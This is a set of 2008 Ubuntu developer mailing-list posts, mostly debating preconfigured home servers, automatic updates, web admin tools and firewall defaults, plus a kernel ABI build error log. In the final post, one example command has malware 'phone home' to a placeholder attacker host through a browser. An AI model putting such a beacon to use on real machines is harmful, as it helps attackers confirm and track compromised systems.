Re: Disappointed with Ubuntu Server, could be used by such a wider audience
On Fri, Aug 1, 2008 at 11:25 PM, Stephan Hermann <[EMAIL PROTECTED]> wrote: >Serious, for a normal familiy I would advise to by ready made >appliances..they are tested, and are usable (well not everytime, but If a security flaw is found in such an appliance it would be much harder to patch than one found in software. It does have the advantage that getting root on the appliance doesn't necessarily give you root on the PC. However we could do something similar with VM's, chroot jails or Plash. > And > the work to stay up2date is much more then you imagine...even on Ubuntu > and even with apt. > You know, people with windows, they always get this little icon with > updates available...how many of them are doing the updates everytime > this pops up? (same question also comes for ubuntu or any linux distro > in general). If a large part of the security model is having a trained monkey wait for updates to appear and click yes then the security model and UI is broken and should be fixed. I don't analyze updates to see if they are "good" or not (how can I? they are binary). I can see only two advantages to manual updates: if an update seriously breaks things we get more warning and we can decide to not update packages that we intend to remove. These seem easier to work around than being hacked. > I do like the idea of an entainment home server or a media center > edition of ubuntu, but it shouldn't be used for webserver or smtp > server at home (*shiver*) Having e.g. a simple webserver can be a handy way of copying files from machine to machine. Ironically it is much easier to get windows to talk to an http server than samba. -- John C. McCabe-Dansted PhD Student University of Western Australia -- Ubuntu-devel-discuss mailing list Ubuntu-devel-discuss@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss
Re: Disappointed with Ubuntu Server, could be used by such a wider audience
On Sat, Aug 02, 2008 at 03:51:35PM +0800, John McCabe-Dansted wrote: > On Fri, Aug 1, 2008 at 11:25 PM, Stephan Hermann <[EMAIL PROTECTED]> wrote: > >Serious, for a normal familiy I would advise to by ready made > >appliances..they are tested, and are usable (well not everytime, but > > If a security flaw is found in such an appliance it would be much > harder to patch than one found in software. > It does have the advantage that getting root on the appliance doesn't > necessarily give you root on the PC. However we could do something > similar with VM's, chroot jails or Plash. Well, what we want is a simple tool to make families life happier, not scary. Yes, a security flaw on an appliance is serious, but having it bought from vendor X and have trust in this company I hope a security fix is on it's way. Regarding Ubuntu, yes, we do security updates, but I don't think people are following the -security ML or are interested in "XSS exploit in wordpress". Normally when you have such an appliance, everything goes automatically, and you don't need to put your hands on. Again, don't think like an expert...think like Mr. Smith and Mrs. Robinson. > > > And > > the work to stay up2date is much more then you imagine...even on Ubuntu > > and even with apt. > > You know, people with windows, they always get this little icon with > > updates available...how many of them are doing the updates everytime > > this pops up? (same question also comes for ubuntu or any linux distro > > in general). > > If a large part of the security model is having a trained monkey wait > for updates to appear and click yes then the security model and UI is > broken and should be fixed. I don't analyze updates to see if they are > "good" or not (how can I? they are binary). I can see only two > advantages to manual updates: if an update seriously breaks things we > get more warning and we can decide to not update packages that we > intend to remove. These seem easier to work around than being hacked. Ok and here it comes: Windows Updates don't say what is being fixed, actually nobody is interested, and most of the people I know are not caring about security anyways. Therefore, an automatic way of applying (security-) updates is necessary, but this integrated in the normal ubuntu desktop / ubuntu server will be a marketing desaster. For a home entertainment server this would be a good idea. > > > I do like the idea of an entainment home server or a media center > > edition of ubuntu, but it shouldn't be used for webserver or smtp > > server at home (*shiver*) > > Having e.g. a simple webserver can be a handy way of copying files > from machine to machine. Ironically it is much easier to get windows > to talk to an http server than samba. why would someone want that? If you need to copy files from one notebook to the pc, you are much more experienced then the normal family. An appliance can give you that possibility easily without thinking about it. But having all this pre-configured on ubuntu-desktop or server will again be a marketing desaster and a kick in all ubuntu pros bum. There is no easy way to give all people what they want. At least: You need to setup all yourself, or you buy a good appliance which fits your needs. Setting up all yourself without any clue about what you need to do, is IMHO a no go. Regarding the security aspect of appliances, there is a point, but I pay for it, so I have hands on the company who produced the appliance, and if they are not providing everything to make me happy and safe, there is always the possibility to go to court. Regards, \sh -- Ubuntu-devel-discuss mailing list Ubuntu-devel-discuss@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss
Re: Disappointed with Ubuntu Server, could be used by such a wider audience
Folks, I've decided that I'll be using either the ClarkConnect (http://clarkconnect.com) which is Red Hat RHEL/Cent OS based or SME Server (www.smeserver.org) with PHP fired up. People on www.whirlpool.net.au report good experiences with both of these offerings. Both come preconfigured and have a Web GUI (YES!!!). To the poster who said that ISPs shouldn't allow SMTP servers being run, in Australia, the main ISPs will allow this (they'll also let you run your own servers etc) but if there's a spam problem they'll block the port until the problem is fixed. In some cases the port is initially blocked until you request it be unblocked. My understanding is that the configuration of ClarkConnect is such that it takes spam issues into consideration. Regards, Tony -- Ubuntu-devel-discuss mailing list Ubuntu-devel-discuss@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss -- Ubuntu-devel-discuss mailing list Ubuntu-devel-discuss@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss
Re: Disappointed with Ubuntu Server, could be used by such a wider audience
Olá Anthony e a todos. On Thursday 31 July 2008 02:14:06 Anthony Watters wrote: > Preconfigure the thing, give it a GUI web admin, make it easy for someone to > set up a Web server/Webmail/File server either in server only mode or server > and gateway mode. All I should need to set up is a couple of users, provide > the IP address and say whether I want RAID and maybe how I want the > partitions configured (but with suggested recommendations along the way at > every step). Running the risk of being sent to /dev/null by many of the members of this list, but why not improve something like webmin? It works for me, when configuring Postfix and Dovecot. Sure its not the safest software around (I once mess up my rc levels, but thats mostly my fault not the software), but it can certainly ease or reduce the barrier entrance for this use case.. -- BUGabundo :o) (``-_-´´) http://Ubuntu.BUGabundo.net Linux user #443786GPG key 1024D/A1784EBB My new micro-blog @ http://BUGabundo.net ps. My emails tend to sound authority and aggressive. I'm sorry in advance. I'll try to be more assertive as time goes by... signature.asc Description: This is a digitally signed message part. -- Ubuntu-devel-discuss mailing list Ubuntu-devel-discuss@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss
Re: Disappointed with Ubuntu Server, could be used by such a wider audience
Olá Stephan e a todos. On Friday 01 August 2008 16:25:01 Stephan Hermann wrote: > Fact One: an ISP who allows people running smtp servers should be > punished. Private users should use an SMTP Gateway at their ISP or on > some root server, but shouldn't be able to send via smtp server <-> > smtp server. (HInt: Spammers are using those methods) I'm not pro-guns or anything, so this is just an example: Dont allow guns to be sell, they kill ppl -- BUGabundo :o) (``-_-´´) http://Ubuntu.BUGabundo.net Linux user #443786GPG key 1024D/A1784EBB My new micro-blog @ http://BUGabundo.net ps. My emails tend to sound authority and aggressive. I'm sorry in advance. I'll try to be more assertive as time goes by... signature.asc Description: This is a digitally signed message part. -- Ubuntu-devel-discuss mailing list Ubuntu-devel-discuss@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss
Re: Disappointed with Ubuntu Server, could be used by such a wider audience
On Saturday 02 August 2008 12:29, (``-_-´´) -- Fernando wrote: > Olá Anthony e a todos. > > On Thursday 31 July 2008 02:14:06 Anthony Watters wrote: > > Preconfigure the thing, give it a GUI web admin, make it easy for someone > > to set up a Web server/Webmail/File server either in server only mode or > > server and gateway mode. All I should need to set up is a couple of > > users, provide the IP address and say whether I want RAID and maybe how I > > want the partitions configured (but with suggested recommendations along > > the way at every step). > > Running the risk of being sent to /dev/null by many of the members of this > list, but why not improve something like webmin? It works for me, when > configuring Postfix and Dovecot. > > Sure its not the safest software around (I once mess up my rc levels, but > thats mostly my fault not the software), but it can certainly ease or > reduce the barrier entrance for this use case.. Did you look at ebox? It's meant to be our safer equivalent. Scott K -- Ubuntu-devel-discuss mailing list Ubuntu-devel-discuss@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss
Re: usplash and alternate resolutions
On Tue, Jul 22, 2008 at 01:27:12PM -0400, Bill Filler wrote: > Hello, > Does anyone know if there is work underway in usplash to support > resolutions such as 1024x600 and 1280x800 (without stretching the > image), which are proving to be quite common in the netbook space? If > not, any hints as to the efforts of adding this support would be > appreciated. The most practical way of doing so would be to add code to parse the vesa mode list in an attempt to find a mode that matches the actual screen resolution, but a lot of hardware won't have this. Beyond that, wait for kernel modesetting support. -- Matthew Garrett | [EMAIL PROTECTED] -- Ubuntu-devel-discuss mailing list Ubuntu-devel-discuss@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss
ABI error building Intrepid Ibex
I just installed 8.04 onto my Dell e1405 laptop, and now I'm trying to build the Intrepid Ibex kernel, but I'm running into a problem. I cloned the git repository, updated the config files (which may not have been necessary), and then kicked off the compile: git clone git://kernel.ubuntu.com/ubuntu/ubuntu-intrepid.git ubuntu-intrepid cd ubuntu-intrepid debian/rules updateconfigs AUTOBUILD=1 fakeroot debian/rules binary-debs After autobuild ran for a long time, I got the following error (if I re-run autobuild I get the error right away): === II: Checking ABI for generic... Reading symbols/modules to ignore...read 1 symbols/modules. Reading new symbols (5)...read 7771 symbols. Reading old symbols (5)...read 7764 symbols. II: Checking for missing symbols in new ABI...found 0 missing symbols II: Checking for new symbols in new ABI... NEW : lirc_get_pdata NEW : lirc_register_plugin NEW : cmdir_write NEW : cmdir_read NEW : set_tx_channels NEW : lirc_unregister_plugin NEW : p80211_allow_ioctls found 7 new symbols WW: Found new symbols within same ABI. Not recommended II: Checking for changes to ABI... HASH : p80211_resume: 0x3e7f4a0b => 0x91f86c1c (ignored) HASH : p80211wext_event_associated : 0x5371ac73 => 0xcbba68e3 (ignored) HASH : reserve_ibft_region : 0xd5bca5ec => 0x2d09b21a HASH : p80211netdev_hwremoved : 0x299b31d6 => 0xf4992302 (ignored) HASH : wlan_setup : 0xd495d46e => 0xda82d418 (ignored) HASH : wlan_unsetup : 0x31752c7a => 0x8a56d4db (ignored) HASH : register_wlandev : 0xb9089ef4 => 0xf1735fff (ignored) HASH : unregister_wlandev : 0x6dfdff6f => 0x0d993080 (ignored) HASH : p80211_suspend : 0xa2bcb709 => 0x31c95da7 (ignored) HASH : dump_stack : 0xb4e32191 => 0x6b2dc060 HASH : p80211netdev_rx : 0x3dc32993 => 0x8e1d65f3 (ignored) HASH : p80211skb_free : 0xb42124b9 => 0x90961618 (ignored) HASH : p80211skb_rxmeta_attach : 0x83b432b7 => 0x6672ce88 (ignored) EE: 2 symbols changed hash and weren't ignored II: Module hash change summary... ubuntu/misc/wireless/p80211/p80211 : 11 vmlinux : 2 II: Done make: *** [abi-check-generic] Error 1 === There are no debs in the parent directory, so the kernel build seems to have failed. Can anyone help me out? Thanks, Mike -- Ubuntu-devel-discuss mailing list Ubuntu-devel-discuss@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss
Re: Disappointed with Ubuntu Server, could be used by such a wider audience
On Sat, Aug 2, 2008 at 6:23 AM, Mackenzie Morgan <[EMAIL PROTECTED]> wrote: > Because as he said, if you pre-configure everything to > super-duper-easy-peasy, you've also pre-configured it to > super-duper-easy-peasy-to-crack. I'm personally disappointed by > firewalls that allow outbound by default, because something could phone > home if I put my trust in an application I shouldn't, but they're > easy-peasy for users, so that's what people do. I can manually go > through and fix it myself, but if some application is running about > opening who knows how many ports and setting god-knows-what services to > auto-start and mucking about with insecure options in config files...how > many months is it going to take me to track all of that down? No way. Commercial windows firewall pretty much all block outbound traffic by default, popping up a dialog box offering to allow that particular application to access the internet. I understand that it is fairly easily for an attacker to phone home though. For example, just run firefox http://ATTACKER/this-machine-is-cracked. However if it good practice to prevent e.g. httpd making outgoing connections this should be done by default. It is fairly easy to do this with e.g. systrace. The arguments that it is hard to step up these systems to be secure seems to be an argument that they should be secured once, by Ubuntu, with a great deal of scrutiny on whether the configuration really is secure. Even if we assume that everyone will hire a UNIX guru we can't assume that all the "gurus" really are gurus or that they won't forget one tiny exploit. Ubuntu desktop already has one server function. I can right click a file, go to share and share the folder using samba. If you know of any security flaws with this GUI, please report a bug. -- John C. McCabe-Dansted PhD Student University of Western Australia -- Ubuntu-devel-discuss mailing list Ubuntu-devel-discuss@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-devel-discuss
